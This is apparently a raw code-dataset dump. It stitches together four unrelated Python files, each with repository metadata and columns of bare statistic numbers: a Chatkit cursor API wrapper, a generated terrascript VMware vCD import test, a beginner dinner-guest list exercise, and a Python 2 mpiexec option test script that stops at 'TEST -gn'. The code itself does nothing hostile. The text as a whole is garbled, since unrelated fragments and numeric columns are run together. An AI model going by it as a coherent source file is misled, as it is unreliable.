2018-10-19T09:02:25.000Z
|
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit_python_sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | null | null | null |
chatkit_python_sdk/cursors.py
|
icappello-zg/chatkit_python_sdk
|
1a90924f5b4dd51b7a0166e0f5e95cac5b8577d4
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import chatkit_python_sdk.base as base
def set_cursor(chatkit_access_data, room_id, user_id, message_id):
    """Store the read cursor of *user_id* in *room_id* at position *message_id* (PUT)."""
    path = ['cursors', '0', 'rooms', room_id, 'users', user_id]
    payload = {"position": message_id}
    return base.chatkit_cursor_request(
        chatkit_access_data, path, method="PUT", json_parameters=payload)
def get_cursor(chatkit_access_data, room_id, user_id):
    """Fetch the read cursor of *user_id* in *room_id* (GET)."""
    path = ['cursors', '0', 'rooms', room_id, 'users', user_id]
    return base.chatkit_cursor_request(chatkit_access_data, path, method="GET")
def get_cursors_by_user(chatkit_access_data, user_id):
    """Fetch all read cursors belonging to *user_id* (GET)."""
    path = ['cursors', '0', 'users', user_id]
    return base.chatkit_cursor_request(chatkit_access_data, path, method="GET")
def get_cursors_by_room(chatkit_access_data, room_id):
    """Fetch all read cursors set in *room_id* (GET)."""
    path = ['cursors', '0', 'rooms', room_id]
    return base.chatkit_cursor_request(chatkit_access_data, path, method="GET")
| 30.454545
| 117
| 0.747264
| 141
| 1,005
| 4.921986
| 0.234043
| 0.149856
| 0.195965
| 0.126801
| 0.801153
| 0.770893
| 0.731988
| 0.731988
| 0.587896
| 0.587896
| 0
| 0.005747
| 0.134328
| 1,005
| 32
| 118
| 31.40625
| 0.791954
| 0.01194
| 0
| 0.3125
| 0
| 0
| 0.082745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.0625
| 0
| 0.5625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
98ca6237d635289ec7dae3470f8d63fd2ce810a1
| 7,563
|
py
|
Python
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_vmware_vcd.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_vmware_vcd.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:19 UTC)
def test_provider_import():
    """Smoke test: the generated vcd provider module is importable."""
    import terrascript.provider.vmware.vcd
def test_resource_import():
    """Smoke test: every generated vcd resource class is importable.

    Each ``from ... import`` both imports the module and asserts the
    named resource class exists; any missing generated class raises
    ImportError and fails the test.
    """
    from terrascript.resource.vmware.vcd import vcd_catalog
    from terrascript.resource.vmware.vcd import vcd_catalog_item
    from terrascript.resource.vmware.vcd import vcd_catalog_media
    from terrascript.resource.vmware.vcd import vcd_edgegateway
    from terrascript.resource.vmware.vcd import vcd_edgegateway_settings
    from terrascript.resource.vmware.vcd import vcd_edgegateway_vpn
    from terrascript.resource.vmware.vcd import vcd_external_network
    from terrascript.resource.vmware.vcd import vcd_external_network_v2
    from terrascript.resource.vmware.vcd import vcd_global_role
    from terrascript.resource.vmware.vcd import vcd_independent_disk
    from terrascript.resource.vmware.vcd import vcd_inserted_media
    from terrascript.resource.vmware.vcd import vcd_lb_app_profile
    from terrascript.resource.vmware.vcd import vcd_lb_app_rule
    from terrascript.resource.vmware.vcd import vcd_lb_server_pool
    from terrascript.resource.vmware.vcd import vcd_lb_service_monitor
    from terrascript.resource.vmware.vcd import vcd_lb_virtual_server
    from terrascript.resource.vmware.vcd import vcd_network_direct
    from terrascript.resource.vmware.vcd import vcd_network_isolated
    from terrascript.resource.vmware.vcd import vcd_network_isolated_v2
    from terrascript.resource.vmware.vcd import vcd_network_routed
    from terrascript.resource.vmware.vcd import vcd_network_routed_v2
    from terrascript.resource.vmware.vcd import vcd_nsxt_app_port_profile
    from terrascript.resource.vmware.vcd import vcd_nsxt_edgegateway
    from terrascript.resource.vmware.vcd import vcd_nsxt_firewall
    from terrascript.resource.vmware.vcd import vcd_nsxt_ip_set
    from terrascript.resource.vmware.vcd import vcd_nsxt_ipsec_vpn_tunnel
    from terrascript.resource.vmware.vcd import vcd_nsxt_nat_rule
    from terrascript.resource.vmware.vcd import vcd_nsxt_network_dhcp
    from terrascript.resource.vmware.vcd import vcd_nsxt_network_imported
    from terrascript.resource.vmware.vcd import vcd_nsxt_security_group
    from terrascript.resource.vmware.vcd import vcd_nsxv_dhcp_relay
    from terrascript.resource.vmware.vcd import vcd_nsxv_dnat
    from terrascript.resource.vmware.vcd import vcd_nsxv_firewall_rule
    from terrascript.resource.vmware.vcd import vcd_nsxv_ip_set
    from terrascript.resource.vmware.vcd import vcd_nsxv_snat
    from terrascript.resource.vmware.vcd import vcd_org
    from terrascript.resource.vmware.vcd import vcd_org_group
    from terrascript.resource.vmware.vcd import vcd_org_user
    from terrascript.resource.vmware.vcd import vcd_org_vdc
    from terrascript.resource.vmware.vcd import vcd_rights_bundle
    from terrascript.resource.vmware.vcd import vcd_role
    from terrascript.resource.vmware.vcd import vcd_vapp
    from terrascript.resource.vmware.vcd import vcd_vapp_access_control
    from terrascript.resource.vmware.vcd import vcd_vapp_firewall_rules
    from terrascript.resource.vmware.vcd import vcd_vapp_nat_rules
    from terrascript.resource.vmware.vcd import vcd_vapp_network
    from terrascript.resource.vmware.vcd import vcd_vapp_org_network
    from terrascript.resource.vmware.vcd import vcd_vapp_static_routing
    from terrascript.resource.vmware.vcd import vcd_vapp_vm
    from terrascript.resource.vmware.vcd import vcd_vm
    from terrascript.resource.vmware.vcd import vcd_vm_affinity_rule
    from terrascript.resource.vmware.vcd import vcd_vm_internal_disk
    from terrascript.resource.vmware.vcd import vcd_vm_sizing_policy
def test_datasource_import():
    """Smoke test: every generated vcd data-source class is importable.

    Mirrors ``test_resource_import`` but for the ``terrascript.data``
    namespace; the data-source set differs from the resource set
    (e.g. ``vcd_portgroup``, ``vcd_resource_list`` exist only here).
    """
    from terrascript.data.vmware.vcd import vcd_catalog
    from terrascript.data.vmware.vcd import vcd_catalog_item
    from terrascript.data.vmware.vcd import vcd_catalog_media
    from terrascript.data.vmware.vcd import vcd_edgegateway
    from terrascript.data.vmware.vcd import vcd_external_network
    from terrascript.data.vmware.vcd import vcd_external_network_v2
    from terrascript.data.vmware.vcd import vcd_global_role
    from terrascript.data.vmware.vcd import vcd_independent_disk
    from terrascript.data.vmware.vcd import vcd_lb_app_profile
    from terrascript.data.vmware.vcd import vcd_lb_app_rule
    from terrascript.data.vmware.vcd import vcd_lb_server_pool
    from terrascript.data.vmware.vcd import vcd_lb_service_monitor
    from terrascript.data.vmware.vcd import vcd_lb_virtual_server
    from terrascript.data.vmware.vcd import vcd_network_direct
    from terrascript.data.vmware.vcd import vcd_network_isolated
    from terrascript.data.vmware.vcd import vcd_network_isolated_v2
    from terrascript.data.vmware.vcd import vcd_network_routed
    from terrascript.data.vmware.vcd import vcd_network_routed_v2
    from terrascript.data.vmware.vcd import vcd_nsxt_app_port_profile
    from terrascript.data.vmware.vcd import vcd_nsxt_edge_cluster
    from terrascript.data.vmware.vcd import vcd_nsxt_edgegateway
    from terrascript.data.vmware.vcd import vcd_nsxt_firewall
    from terrascript.data.vmware.vcd import vcd_nsxt_ip_set
    from terrascript.data.vmware.vcd import vcd_nsxt_ipsec_vpn_tunnel
    from terrascript.data.vmware.vcd import vcd_nsxt_manager
    from terrascript.data.vmware.vcd import vcd_nsxt_nat_rule
    from terrascript.data.vmware.vcd import vcd_nsxt_network_dhcp
    from terrascript.data.vmware.vcd import vcd_nsxt_network_imported
    from terrascript.data.vmware.vcd import vcd_nsxt_security_group
    from terrascript.data.vmware.vcd import vcd_nsxt_tier0_router
    from terrascript.data.vmware.vcd import vcd_nsxv_dhcp_relay
    from terrascript.data.vmware.vcd import vcd_nsxv_dnat
    from terrascript.data.vmware.vcd import vcd_nsxv_firewall_rule
    from terrascript.data.vmware.vcd import vcd_nsxv_ip_set
    from terrascript.data.vmware.vcd import vcd_nsxv_snat
    from terrascript.data.vmware.vcd import vcd_org
    from terrascript.data.vmware.vcd import vcd_org_user
    from terrascript.data.vmware.vcd import vcd_org_vdc
    from terrascript.data.vmware.vcd import vcd_portgroup
    from terrascript.data.vmware.vcd import vcd_resource_list
    from terrascript.data.vmware.vcd import vcd_resource_schema
    from terrascript.data.vmware.vcd import vcd_right
    from terrascript.data.vmware.vcd import vcd_rights_bundle
    from terrascript.data.vmware.vcd import vcd_role
    from terrascript.data.vmware.vcd import vcd_storage_profile
    from terrascript.data.vmware.vcd import vcd_vapp
    from terrascript.data.vmware.vcd import vcd_vapp_network
    from terrascript.data.vmware.vcd import vcd_vapp_org_network
    from terrascript.data.vmware.vcd import vcd_vapp_vm
    from terrascript.data.vmware.vcd import vcd_vcenter
    from terrascript.data.vmware.vcd import vcd_vm
    from terrascript.data.vmware.vcd import vcd_vm_affinity_rule
    from terrascript.data.vmware.vcd import vcd_vm_sizing_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.vcd
#
# t = terrascript.provider.vmware.vcd.vcd()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-vcd' in s
# assert '3.3.1' in s
| 31.911392
| 80
| 0.80907
| 1,083
| 7,563
| 5.408126
| 0.116343
| 0.169029
| 0.27147
| 0.325764
| 0.912413
| 0.900802
| 0.900802
| 0.87007
| 0.465426
| 0.03483
| 0
| 0.003381
| 0.139759
| 7,563
| 236
| 81
| 32.04661
| 0.896864
| 0.062277
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004237
| 0
| 1
| 0.027273
| true
| 0
| 1
| 0
| 1.027273
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
c710dffcaccb63b2d101a105ab2a3df1e66d9fc6
| 1,671
|
py
|
Python
|
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
python_02_list/name_list.py
|
lexiaoyuan/PythonCrashCourse
|
9d1c59012d3ae9fdbfc468bbf401f567ce88681b
|
[
"MIT"
] | null | null | null |
# Dinner-invitation exercise: build a guest list, swap a guest out,
# grow the list, then shrink it back down to two and finally empty it.
#
# Fixes: the message typo "fot dinner" -> "for dinner", and the
# copy-pasted per-index print statements are replaced with loops that
# produce the same sequence of invitations.
name_lists = ['dad', 'mom', 'yege', 'ruanwei']

# First round of invitations.
for guest in name_lists:
    print("Invite " + guest.title() + " to dinner!")
print(name_lists[3].title() + " can't come for dinner!")

# Replace the guest who cannot attend and re-invite everyone.
name_lists.remove('ruanwei')
name_lists.append('yangxi')
for guest in name_lists:
    print("Invite " + guest.title() + " to dinner!")

# A bigger table: add three more guests and invite all seven.
print("I found a bigger table")
name_lists.insert(0, 'zhangliangyin')
name_lists.insert(3, 'shuchang')
name_lists.append('zhugedali')
for guest in name_lists:
    print("Invite " + guest.title() + " to dinner!")

# Table shrank: uninvite the last five, re-invite the remaining two.
print("I can only invite two guests")
for _ in range(5):
    print("I'm sorry I can't invite " + name_lists.pop().title())
for guest in name_lists:
    print("Invite " + guest.title() + " to dinner!")

# Clear the list entirely and show that it is empty.
del name_lists[0]
del name_lists[0]
print(name_lists)
| 41.775
| 61
| 0.648713
| 258
| 1,671
| 4.077519
| 0.158915
| 0.273764
| 0.313688
| 0.323194
| 0.752852
| 0.73384
| 0.73384
| 0.656844
| 0.656844
| 0.656844
| 0
| 0.015131
| 0.129862
| 1,671
| 39
| 62
| 42.846154
| 0.708391
| 0
| 0
| 0.617647
| 0
| 0
| 0.337522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.764706
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c75d3dbb080f40396cd4339270c6d6f7e6137de6
| 14,505
|
py
|
Python
|
src/pm/mpd/test/test2.py
|
raffenet/mpich-CVS
|
2d33e2742e8c00db4f56a373fea051cc6c0ee0d0
|
[
"mpich2"
] | 1
|
2021-11-11T15:42:30.000Z
|
2021-11-11T15:42:30.000Z
|
src/pm/mpd/test/test2.py
|
grondo/mvapich2-cce
|
ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb
|
[
"Intel",
"mpich2",
"Unlicense"
] | null | null | null |
src/pm/mpd/test/test2.py
|
grondo/mvapich2-cce
|
ec084d8e07db1cf2ac1352ee4c604ae7dbae55cb
|
[
"Intel",
"mpich2",
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Python 2 test script for the mpd process manager's mpiexec front end.
# Each "# test:" section is deliberately self-contained (it re-imports,
# re-creates MPDTest, and boots/tears down the mpd ring itself) so that
# a single test can be copied out and run on its own.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be chgd simply by altering its value(s)
# for one or more of:
#    PYEXT, NMPDS, HFILE
# PYEXT: suffix of the mpd executables; NMPDS: ring size; HFILE: hostfile name.
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "mpiexec tests-------------------------------------------"
# Hosts bp400..bp407; tests assume these cluster nodes are reachable.
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
# test: -machinefile maps ranks to hosts (2 per host via the ":2" spec).
print "TEST -machinefile"
PYEXT = '.py'
NMPDS = 4
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
# tempm is the machinefile: "host:2 ifhn=host" per line.
tempm = open('tempm','w')
for host in clusterHosts: print >>tempm, '%s:2 ifhn=%s' % (host,host)
tempm.close()
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: bp400\n1: bp400\n2: bp401\n3: bp401\n'   # 2 per host because of :2's in tempm
mpdtest.run(cmd="mpiexec%s -l -machinefile %s -n 4 hostname" % (PYEXT,'tempm'), chkOut=1, expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -file runs processes described by an XML process-group spec.
print "TEST -file"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
tempfilename = '/tmp/%s_tempin2' % (os.environ['USER'])
f = open(tempfilename,'w')
print >>f, """
<create-process-group totalprocs='3'>
    <process-spec
        range='0-2'
        exec='/bin/echo'>
        <arg idx='1' value="hello"> </arg>
        <arg idx='2' value="again"> </arg>
    </process-spec>
</create-process-group>
"""
f.close()
expout = 'hello again\nhello again\nhello again\n'
mpdtest.run(cmd="mpiexec%s -file %s" % (PYEXT,tempfilename),chkOut=1,expOut=expout)
os.unlink(tempfilename)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -configfile reads mpiexec argument sets, one per line.
print "TEST -configfile"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
tempfilename = '/tmp/%s_tempin2' % (os.environ['USER'])
f = open(tempfilename,'w')
print >>f, "-l\n-n 1 echo hello there\n-n 1 echo hello again"
f.close()
expout = '0: hello there\n1: hello again\n'
mpdtest.run(cmd="mpiexec%s -configfile %s" % (PYEXT,tempfilename),chkOut=1,expOut=expout)
os.unlink(tempfilename)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -l prefixes each output line with its rank.
print "TEST -l"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: hello\n1: bye\n'
mpdtest.run(cmd="mpiexec%s -l -n 1 echo hello : -n 1 echo bye" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -m merges identical output lines from multiple ranks ("0-1: ...").
print "TEST -m"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0-1: hello\n'
mpdtest.run(cmd="mpiexec%s -m -n 2 echo hello" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -ecfn writes exit codes to an XML file; verify the file content too.
print "TEST -ecfn"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\n'
rv = mpdtest.run(cmd="mpiexec%s -ecfn tempxout -n 1 echo hello" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
linesAsStr = commands.getoutput("cat tempxout")
os.unlink("tempxout")
if linesAsStr.find('exit-codes') < 0:
    print "ecfn: Failed to create correct contents of xml file:"
    print linesAsStr
    sys.exit(-1)
# test: -s selects which ranks receive stdin (single, range, list, or all).
print "TEST -s"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -n 1" % (PYEXT) )
expin = 'hello\n'
expout = '0: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -n 4 cat -" % (PYEXT),
                 expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n1: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s 0-3 -n 4 cat -" % (PYEXT),
                 expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n1: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s all -n 4 cat -" % (PYEXT),
                 expOut=expout,chkOut=1,expIn=expin)
expout = '0: hello\n2: hello\n3: hello\n'
rv = mpdtest.run(cmd="mpiexec%s -l -s 0,2-3 -n 4 cat -" % (PYEXT),
                 expOut=expout,chkOut=1,expIn=expin)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -1 avoids running on the local mpd; rank 0 lands on the first remote host.
print "TEST -1"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n' % (clusterHosts[0])
rv = mpdtest.run(cmd="mpiexec%s -1 -n 1 /bin/hostname" % (PYEXT), expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -ifhn sets the interface hostname used for communication.
print "TEST -ifhn"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\n'
rv = mpdtest.run(cmd="mpiexec%s -ifhn 127.0.0.1 -n 1 /bin/echo hello" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -n sets the process count per command block (":"-separated blocks).
print "TEST -n"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '0: hello\n1: bye\n'
mpdtest.run(cmd="mpiexec%s -l -n 1 echo hello : -n 1 echo bye" % (PYEXT),chkOut=1,expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -wdir sets the working directory of the launched processes.
print "TEST -wdir"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '/tmp\n/tmp\n'
rv = mpdtest.run(cmd="mpiexec%s -wdir /tmp -n 2 /bin/pwd" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -path sets PATH for the launched processes.
print "TEST -path"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '/tmp:/bin\n/tmp:/bin\n'
mpdtest.run(cmd="mpiexec%s -path /tmp:/bin -n 2 sh -c '/bin/echo $PATH'" % (PYEXT),
            expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -host pins a command block to a specific host.
print "TEST -host"
# not a particularly good test; you can hang/fail with an invalid ifhn
# ifhn is not very useful for mpiexec since mpd can fill it in as needed
PYEXT = '.py'
NMPDS = 5
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n' % clusterHosts[3]
rv = mpdtest.run(cmd="mpiexec%s -n 1 -host %s /bin/hostname" % (PYEXT,clusterHosts[3]),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -soft triplet "first:last:stride" relaxes -n; 1:5:2 with -n 9 yields 5 procs.
print "TEST -soft"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\nhello\nhello\nhello\nhello\n'  # 5 times
rv = mpdtest.run(cmd="mpiexec%s -n 9 -soft 1:5:2 /bin/echo hello" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -envall passes the whole caller environment through (the default).
print "TEST -envall (the default)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'BAR\n'
os.environ['FOO'] = 'BAR'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envall sh -c '/bin/echo $FOO'" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -envnone passes no environment; $FOO expands to empty.
print "TEST -envnone"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '\n'
os.environ['FOO'] = ''
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envnone sh -c '/bin/echo $FOO'" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -env sets a single NAME VALUE pair in the child environment.
print "TEST -env"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'BAR\n'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -env FOO BAR sh -c '/bin/echo $FOO'" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -envlist forwards a comma-separated subset of the caller's env vars.
print "TEST -envlist"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
os.environ['FOO'] = 'BAR'
os.environ['RMB'] = 'ZZZ'
expout = 'BAR ZZZ\n'
rv = mpdtest.run(cmd="mpiexec%s -n 1 -envlist FOO,RMB sh -c '/bin/echo $FOO $RMB'" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -gn sets a global default process count for every command block.
print "TEST -gn"
